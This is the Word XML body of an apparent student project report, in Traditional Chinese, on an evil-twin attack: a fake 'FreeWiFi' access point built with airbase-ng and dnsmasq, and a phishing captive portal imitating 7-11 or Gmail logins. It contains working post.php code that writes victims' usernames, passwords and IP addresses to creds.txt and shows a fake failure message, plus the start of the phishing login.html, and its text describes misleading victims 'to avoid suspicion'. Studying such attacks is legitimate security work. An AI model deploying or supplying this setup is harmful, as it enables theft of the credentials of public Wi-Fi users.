                            <wps:cNvSpPr/>
                            <wps:spPr>
                              <a:xfrm>
                                <a:off x="1876140" y="1713320"/>
                                <a:ext cx="1522029" cy="9132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59A163" w14:textId="77777777" w:rsidR="003646DE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標楷體" w:eastAsia="標楷體" w:hAnsi="標楷體" w:cs="標楷體"/>
                                      <w:color w:val="000000"/>
                                    </w:rPr>
                                    <w:t>5. 使用者連線並輸入帳密</w:t>
                                  </w:r>
                                </w:p>
                              </w:txbxContent>
                            </wps:txbx>
                            <wps:bodyPr spcFirstLastPara="1" wrap="square" lIns="85325" tIns="85325" rIns="85325" bIns="853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AEF928" id="群組 1835434092" o:spid="_x0000_s1026" style="width:415.3pt;height:242.25pt;mso-position-horizontal-relative:char;mso-position-vertical-relative:line" coordorigin="27065,22417" coordsize="52766,30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">
                <v:group id="群組 507355625" o:spid="_x0000_s1027" style="position:absolute;left:27088;top:22417;width:52743;height:30765" coordsize="52766,3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">
                  <v:rect id="矩形 1143231893" o:spid="_x0000_s1028" style="position:absolute;width:52766;height:30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77FABC03" w14:textId="77777777" w:rsidR="003646DE" w:rsidRDefault="003646D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群組 271189944" o:spid="_x0000_s1029" style="position:absolute;width:52743;height:30765" coordsize="52743,30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">
                    <v:rect id="矩形 871207975" o:spid="_x0000_s1030" style="position:absolute;width:52743;height:30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0146828D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shape id="手繪多邊形: 圖案 612010952" o:spid="_x0000_s1031" style="position:absolute;left:15242;top:8609;width:3195;height:914;visibility:visible;mso-wrap-style:square;v-text-anchor:middle" coordsize="120000,12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" adj="-11796480,,5400" path="m,60000r120000,e" filled="f" strokecolor="#599bd5">
                      <v:stroke startarrowwidth="narrow" startarrowlength="short" endarrow="classic" joinstyle="miter"/>
                      <v:formulas/>
                      <v:path arrowok="t" o:extrusionok="f" o:connecttype="custom" textboxrect="0,0,120000,120000"/>
                      <v:textbox inset="2.53958mm,2.53958mm,2.53958mm,2.53958mm">
                        <w:txbxContent>
                          <w:p w14:paraId="07C9E002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shape>
                    <v:rect id="矩形 19384511" o:spid="_x0000_s1032" style="position:absolute;left:16752;top:9048;width:175;height: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" filled="f" stroked="f">
                      <v:textbox inset="1pt,0,1pt,0">
                        <w:txbxContent>
                          <w:p w14:paraId="22E9C0EF" w14:textId="77777777" w:rsidR="003646DE" w:rsidRDefault="003646DE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  <v:rect id="矩形 1487335924" o:spid="_x0000_s1033" style="position:absolute;left:40;top:4500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" fillcolor="#599bd5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DF0D49D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矩形 2007622520" o:spid="_x0000_s1034" style="position:absolute;left:40;top:4500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" filled="f" stroked="f">
                      <v:textbox inset="2.37014mm,2.37014mm,2.37014mm,2.37014mm">
                        <w:txbxContent>
                          <w:p w14:paraId="2B59136E" w14:textId="77777777" w:rsidR="003646DE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標楷體" w:eastAsia="標楷體" w:hAnsi="標楷體" w:cs="標楷體"/>
                                <w:color w:val="000000"/>
                              </w:rPr>
                              <w:t>1. 啟動 airbase-ng 假 AP</w:t>
                            </w:r>
                          </w:p>
                        </w:txbxContent>
                      </v:textbox>
                    </v:rect>
                    <v:shape id="手繪多邊形: 圖案 767364809" o:spid="_x0000_s1035" style="position:absolute;left:33963;top:8609;width:3195;height:914;visibility:visible;mso-wrap-style:square;v-text-anchor:middle" coordsize="120000,12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" adj="-11796480,,5400" path="m,60000r120000,e" filled="f" strokecolor="#599bd5">
                      <v:stroke startarrowwidth="narrow" startarrowlength="short" endarrow="classic" joinstyle="miter"/>
                      <v:formulas/>
                      <v:path arrowok="t" o:extrusionok="f" o:connecttype="custom" textboxrect="0,0,120000,120000"/>
                      <v:textbox inset="2.53958mm,2.53958mm,2.53958mm,2.53958mm">
                        <w:txbxContent>
                          <w:p w14:paraId="45A815D4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shape>
                    <v:rect id="矩形 785664064" o:spid="_x0000_s1036" style="position:absolute;left:35473;top:9048;width:175;height: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" filled="f" stroked="f">
                      <v:textbox inset="1pt,0,1pt,0">
                        <w:txbxContent>
                          <w:p w14:paraId="0F13D1EE" w14:textId="77777777" w:rsidR="003646DE" w:rsidRDefault="003646DE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  <v:rect id="矩形 1988582829" o:spid="_x0000_s1037" style="position:absolute;left:18761;top:4500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" fillcolor="#599bd5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1121C2B7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矩形 1000564550" o:spid="_x0000_s1038" style="position:absolute;left:18761;top:4500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" filled="f" stroked="f">
                      <v:textbox inset="2.37014mm,2.37014mm,2.37014mm,2.37014mm">
                        <w:txbxContent>
                          <w:p w14:paraId="0C5EEF11" w14:textId="77777777" w:rsidR="003646DE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標楷體" w:eastAsia="標楷體" w:hAnsi="標楷體" w:cs="標楷體"/>
                                <w:color w:val="000000"/>
                              </w:rPr>
                              <w:t>2. 設定 at0 IP 位址</w:t>
                            </w:r>
                          </w:p>
                        </w:txbxContent>
                      </v:textbox>
                    </v:rect>
                    <v:shape id="手繪多邊形: 圖案 370715747" o:spid="_x0000_s1039" style="position:absolute;left:7650;top:13614;width:37442;height:3195;visibility:visible;mso-wrap-style:square;v-text-anchor:middle" coordsize="120000,12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" adj="-11796480,,5400" path="m120000,r,66423l,66423r,53577e" filled="f" strokecolor="#599bd5">
                      <v:stroke startarrowwidth="narrow" startarrowlength="short" endarrow="classic" joinstyle="miter"/>
                      <v:formulas/>
                      <v:path arrowok="t" o:extrusionok="f" o:connecttype="custom" textboxrect="0,0,120000,120000"/>
                      <v:textbox inset="2.53958mm,2.53958mm,2.53958mm,2.53958mm">
                        <w:txbxContent>
                          <w:p w14:paraId="50290C4C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shape>
                    <v:rect id="矩形 1376975679" o:spid="_x0000_s1040" style="position:absolute;left:25431;top:15194;width:1880;height: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" filled="f" stroked="f">
                      <v:textbox inset="1pt,0,1pt,0">
                        <w:txbxContent>
                          <w:p w14:paraId="3F8EF140" w14:textId="77777777" w:rsidR="003646DE" w:rsidRDefault="003646DE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  <v:rect id="矩形 311127938" o:spid="_x0000_s1041" style="position:absolute;left:37482;top:4500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" fillcolor="#599bd5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036DBDD1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矩形 404663464" o:spid="_x0000_s1042" style="position:absolute;left:37482;top:4500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" filled="f" stroked="f">
                      <v:textbox inset="2.37014mm,2.37014mm,2.37014mm,2.37014mm">
                        <w:txbxContent>
                          <w:p w14:paraId="3DFA3B07" w14:textId="77777777" w:rsidR="003646DE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標楷體" w:eastAsia="標楷體" w:hAnsi="標楷體" w:cs="標楷體"/>
                                <w:color w:val="000000"/>
                              </w:rPr>
                              <w:t>3. 啟動 dnsmasq 提供 DHCP/DNS</w:t>
                            </w:r>
                          </w:p>
                        </w:txbxContent>
                      </v:textbox>
                    </v:rect>
                    <v:shape id="手繪多邊形: 圖案 1292626184" o:spid="_x0000_s1043" style="position:absolute;left:15242;top:21242;width:3195;height:914;visibility:visible;mso-wrap-style:square;v-text-anchor:middle" coordsize="120000,12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" adj="-11796480,,5400" path="m,60000r120000,e" filled="f" strokecolor="#599bd5">
                      <v:stroke startarrowwidth="narrow" startarrowlength="short" endarrow="classic" joinstyle="miter"/>
                      <v:formulas/>
                      <v:path arrowok="t" o:extrusionok="f" o:connecttype="custom" textboxrect="0,0,120000,120000"/>
                      <v:textbox inset="2.53958mm,2.53958mm,2.53958mm,2.53958mm">
                        <w:txbxContent>
                          <w:p w14:paraId="6979179C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shape>
                    <v:rect id="矩形 1706598921" o:spid="_x0000_s1044" style="position:absolute;left:16752;top:21681;width:175;height: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" filled="f" stroked="f">
                      <v:textbox inset="1pt,0,1pt,0">
                        <w:txbxContent>
                          <w:p w14:paraId="3B0CC50F" w14:textId="77777777" w:rsidR="003646DE" w:rsidRDefault="003646DE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  <v:rect id="矩形 1407572225" o:spid="_x0000_s1045" style="position:absolute;left:40;top:17133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" fillcolor="#599bd5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17CD92A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矩形 1161630359" o:spid="_x0000_s1046" style="position:absolute;left:40;top:17133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" filled="f" stroked="f">
                      <v:textbox inset="2.37014mm,2.37014mm,2.37014mm,2.37014mm">
                        <w:txbxContent>
                          <w:p w14:paraId="7D3BD813" w14:textId="77777777" w:rsidR="003646DE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標楷體" w:eastAsia="標楷體" w:hAnsi="標楷體" w:cs="標楷體"/>
                                <w:color w:val="000000"/>
                              </w:rPr>
                              <w:t>4. 使用 apache 顯示登入頁</w:t>
                            </w:r>
                          </w:p>
                        </w:txbxContent>
                      </v:textbox>
                    </v:rect>
                    <v:rect id="矩形 1219951922" o:spid="_x0000_s1047" style="position:absolute;left:18761;top:17133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" fillcolor="#599bd5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4F3252D" w14:textId="77777777" w:rsidR="003646DE" w:rsidRDefault="003646D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矩形 841129282" o:spid="_x0000_s1048" style="position:absolute;left:18761;top:17133;width:15220;height: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" filled="f" stroked="f">
                      <v:textbox inset="2.37014mm,2.37014mm,2.37014mm,2.37014mm">
                        <w:txbxContent>
                          <w:p w14:paraId="4D59A163" w14:textId="77777777" w:rsidR="003646DE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標楷體" w:eastAsia="標楷體" w:hAnsi="標楷體" w:cs="標楷體"/>
                                <w:color w:val="000000"/>
                              </w:rPr>
                              <w:t>5. 使用者連線並輸入帳密</w:t>
                            </w:r>
                          </w:p>
                        </w:txbxContent>
                      </v:textbox>
                    </v:rect>
                  </v:group>
                </v:group>
                <w10:anchorlock/>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B9F73A0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六、 預計完成之工作項目及具體成果 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F237905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>工作項目</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="標楷體" w:eastAsia="標楷體" w:hAnsi="標楷體" w:cs="標楷體"/>
          <w:color w:val="141823"/>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:t>表：</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af2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50"/>
        <w:gridCol w:w="5246"/>
      </w:tblGrid>
      <w:tr w:rsidR="003646DE" w14:paraId="1A7E2E72" w14:textId="77777777">
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3050" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0EE6A1FE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b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工作項目</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5246" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="40E1336A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b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具體成果說明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003646DE" w14:paraId="1571ABEB" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3050" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="75C88315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1. 建立假 Wi-Fi 熱點</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5246" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2859BB42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使用 airbase-ng 成功廣播 SSID「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FreeWiFi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」，並接受使用者連線</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003646DE" w14:paraId="25182140" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3050" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="44DD2126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2. 設定網路介面 at0 與 DHCP 功能</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5246" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="724D9348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透過 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ifconfig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/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ip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 + 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dnsmasq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 提供 IP 配發與 DNS 偽導，模擬上網環境</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003646DE" w14:paraId="2FF2B6CE" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3050" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="29C063E7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3. 架設登入頁（login.html）</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5246" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="54C54B9D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建立簡易 Captive Portal 登入頁面，可模擬 7-11/Gmail 等常見介面</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003646DE" w14:paraId="09A93906" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3050" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0D5BBE7A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4. 製作帳密接收與記錄程式</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5246" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="13A7064B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撰寫 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post.php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 接收 POST 表單資料，寫入 logs.txt 並跳轉網址</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003646DE" w14:paraId="2A985463" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3050" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3BFD637C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5. 完整整合 Fake AP 自動流程</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5246" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="02DE70C1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手動整合並可轉換為一鍵腳本，包含啟動 airbase/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dnsmasq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/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apache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 所有步驟</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003646DE" w14:paraId="2D5046D3" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3050" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="30EA1D41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6. 製作報告與展示資料</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5246" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="20711571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PDF、簡報、流程圖與結果 log，可供後續報告或投稿展示使用</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7BB9DE05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24877010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7AE2CE3B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lastRenderedPageBreak/>
        <w:t>關鍵腳本與程式碼片段：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A0EA504" w14:textId="77777777" w:rsidR="003646DE" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="標楷體" w:eastAsia="標楷體" w:hAnsi="標楷體" w:cs="標楷體"/>
          <w:b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 xml:space="preserve">1. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="標楷體" w:eastAsia="標楷體" w:hAnsi="標楷體" w:cs="標楷體"/>
          <w:b/>
          <w:color w:val="141823"/>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:t>post.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="4EDD86C2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proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="標楷體" w:eastAsia="標楷體" w:hAnsi="標楷體" w:cs="標楷體"/>
          <w:color w:val="141823"/>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:t>post.php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 xml:space="preserve"> 用於接收使用者提交的登入資料（帳號與密碼），並將這些資料寫入到 logs.txt 中，最後將使用者重定向到一個正常的網站（如 Google）以避免懷疑。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2387A76E" w14:textId="77777777" w:rsidR="003646DE" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:ascii="標楷體" w:eastAsia="標楷體" w:hAnsi="標楷體" w:cs="標楷體"/>
          <w:color w:val="141823"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="標楷體" w:eastAsia="標楷體" w:hAnsi="標楷體" w:cs="標楷體"/>
          <w:color w:val="141823"/>
        </w:rPr>
        <w:t>&lt;?</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="標楷體" w:eastAsia="標楷體" w:hAnsi="標楷體" w:cs="標楷體"/>
          <w:color w:val="141823"/>
        </w:rPr>
        <w:t>php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="262EF078" w14:textId="77777777" w:rsidR="003646DE" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:ascii="標楷體" w:eastAsia="標楷體" w:hAnsi="標楷體" w:cs="標楷體"/>
          <w:color w:val="141823"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="標楷體" w:eastAsia="標楷體" w:hAnsi="標楷體" w:cs="標楷體"/>
          <w:color w:val="141823"/>
        </w:rPr>
        <w:t>$date = date("Y-m-d H:i:s");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71CBE656" w14:textId="77777777" w:rsidR="003646DE" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:ascii="標楷體" w:eastAsia="標楷體" w:hAnsi="標楷體" w:cs="標楷體"/>
          <w:color w:val="141823"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="標楷體" w:eastAsia="標楷體" w:hAnsi="標楷體" w:cs="標楷體"/>
          <w:color w:val="141823"/>
        </w:rPr>
        <w:t>$</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="標楷體" w:eastAsia="標楷體" w:hAnsi="標楷體" w:cs="標楷體"/>
          <w:color w:val="141823"/>
        </w:rPr>
        <w:t>ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="標楷體" w:eastAsia="標楷體" w:hAnsi="標楷體" w:cs="標楷體"/>
          <w:color w:val="141823"/>
        </w:rPr>
        <w:t xml:space="preserve"> = $_SERVER['REMOTE_ADDR'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36505AAB" w14:textId="77777777" w:rsidR="003646DE" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:ascii="標楷體" w:eastAsia="標楷體" w:hAnsi="標楷體" w:cs="標楷體"/>
          <w:color w:val="141823"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="標楷體" w:eastAsia="標楷體" w:hAnsi="標楷體" w:cs="標楷體"/>
          <w:color w:val="141823"/>
        </w:rPr>
        <w:t>$username = $_POST['username'] ?? 'N/A';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43B31B7A" w14:textId="77777777" w:rsidR="003646DE" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:ascii="標楷體" w:eastAsia="標楷體" w:hAnsi="標楷體" w:cs="標楷體"/>
          <w:color w:val="141823"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="標楷體" w:eastAsia="標楷體" w:hAnsi="標楷體" w:cs="標楷體"/>
          <w:color w:val="141823"/>
        </w:rPr>
        <w:t>$password = $_POST['password'] ?? 'N/A';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4931EA7E" w14:textId="77777777" w:rsidR="003646DE" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:ascii="標楷體" w:eastAsia="標楷體" w:hAnsi="標楷體" w:cs="標楷體"/>
          <w:color w:val="141823"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="標楷體" w:eastAsia="標楷體" w:hAnsi="標楷體" w:cs="標楷體"/>
          <w:color w:val="141823"/>
        </w:rPr>
        <w:t>$log = "[$date] IP: $</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="標楷體" w:eastAsia="標楷體" w:hAnsi="標楷體" w:cs="標楷體"/>
          <w:color w:val="141823"/>
        </w:rPr>
        <w:t>ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="標楷體" w:eastAsia="標楷體" w:hAnsi="標楷體" w:cs="標楷體"/>
          <w:color w:val="141823"/>
        </w:rPr>
        <w:t xml:space="preserve"> | USERNAME: $username | PASSWORD: $password\n";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AFDAF14" w14:textId="77777777" w:rsidR="003646DE" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:ascii="標楷體" w:eastAsia="標楷體" w:hAnsi="標楷體" w:cs="標楷體"/>
          <w:color w:val="141823"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="標楷體" w:eastAsia="標楷體" w:hAnsi="標楷體" w:cs="標楷體"/>
          <w:color w:val="141823"/>
        </w:rPr>
        <w:t>file_put_contents</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="標楷體" w:eastAsia="標楷體" w:hAnsi="標楷體" w:cs="標楷體"/>
          <w:color w:val="141823"/>
        </w:rPr>
        <w:t>("/var/www/html/creds.txt", $log, FILE_APPEND | LOCK_EX);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11325ACD" w14:textId="77777777" w:rsidR="003646DE" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:ascii="標楷體" w:eastAsia="標楷體" w:hAnsi="標楷體" w:cs="標楷體"/>
          <w:color w:val="141823"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="標楷體" w:eastAsia="標楷體" w:hAnsi="標楷體" w:cs="標楷體"/>
          <w:color w:val="141823"/>
        </w:rPr>
        <w:t>echo "&lt;h2&gt;Login failed. Please try again later.&lt;/h2&gt;";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53D2175B" w14:textId="77777777" w:rsidR="003646DE" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="360"/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</w:rPr>
        <w:t>?&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DD6D055" w14:textId="77777777" w:rsidR="003646DE" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="720"/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>功能</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="標楷體" w:eastAsia="標楷體" w:hAnsi="標楷體" w:cs="標楷體"/>
          <w:color w:val="141823"/>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75031149" w14:textId="77777777" w:rsidR="003646DE" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="4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這段 PHP 代碼會接收 login.html 表單提交的資料，並將使用者的帳號和密碼及IP 記錄寫入 logs.txt。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11BB1782" w14:textId="77777777" w:rsidR="003646DE" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="4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完成紀錄後，使用者會被引導至 google.com，避免疑慮。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51817E9D" w14:textId="77777777" w:rsidR="003646DE" w:rsidRDefault="003646DE">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="標楷體" w:eastAsia="標楷體" w:hAnsi="標楷體" w:cs="標楷體"/>
          <w:color w:val="141823"/>
          <w:highlight w:val="white"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6FE32333" w14:textId="77777777" w:rsidR="003646DE" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="標楷體" w:eastAsia="標楷體" w:hAnsi="標楷體" w:cs="標楷體"/>
          <w:b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>2.login.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77CA5761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login.html 是釣魚登入頁，模擬常見的網路登入介面。使用者會在這個頁面上輸入帳號和密碼，這些資料將被傳送到 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post.php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 xml:space="preserve"> 進行處理。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28872E2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&lt;!DOCTYPE html&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="650383FC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&lt;html lang="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en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>"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52EB3C41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&lt;head&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25735E0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&lt;meta charset="UTF-8"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55EC341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&lt;meta name="viewport" content="width=device-width, initial-scale=1.0"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61987ED3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&lt;title&gt;Login Page&lt;/title&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32463E4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&lt;style&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BCF99D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body {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="764D6621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font-family: Arial, sans-serif;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1253F37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background-color: #f0f0f0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39AF7F89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padding: 50px;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CBC6EC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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03F3ABFB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.login-box {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3619792D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background-color: white;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A4A87A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padding: 40px;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="684285AD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border-radius: 10px;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B0F3BA7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box-shadow: 0 4px 6px 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rgba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>(0, 0, 0, 0.1);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72704E88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max-width: 400px;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5981A194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margin: auto;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D209370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lastRenderedPageBreak/>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45C52660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.login-box h2 {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="375DFFED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text-align: center;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C2FF2C7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margin-bottom: 20px;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4681814D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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="714A4BF9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.login-box input {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A5189F7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width: 100%;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3526A1F9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padding: 10px;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26208DB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margin: 10px 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49EAAC62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border: 1px solid #ccc;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AE3F6D4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border-radius: 5px;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26810AF1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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F8D96EB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.login-box button {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35E3874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width: 100%;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74C929F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padding: 10px;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="645D03DC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background-color: #4CAF50;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F6A023C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color: white;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00E4A68C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border: none;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ED5E7CE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border-radius: 5px;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F2AA45A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cursor: pointer;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31EFDFD2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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A6A4DE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.login-box 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button:hover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 xml:space="preserve"> {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B3CB113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background-color: #45a049;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22620B48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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="265799C8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&lt;/style&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09B35238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&lt;/head&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F65E98A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&lt;body&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43BD19A4" w14:textId="77777777" w:rsidR="003646DE" w:rsidRDefault="003646DE">
      <w:pPr>
        <w:rPr>
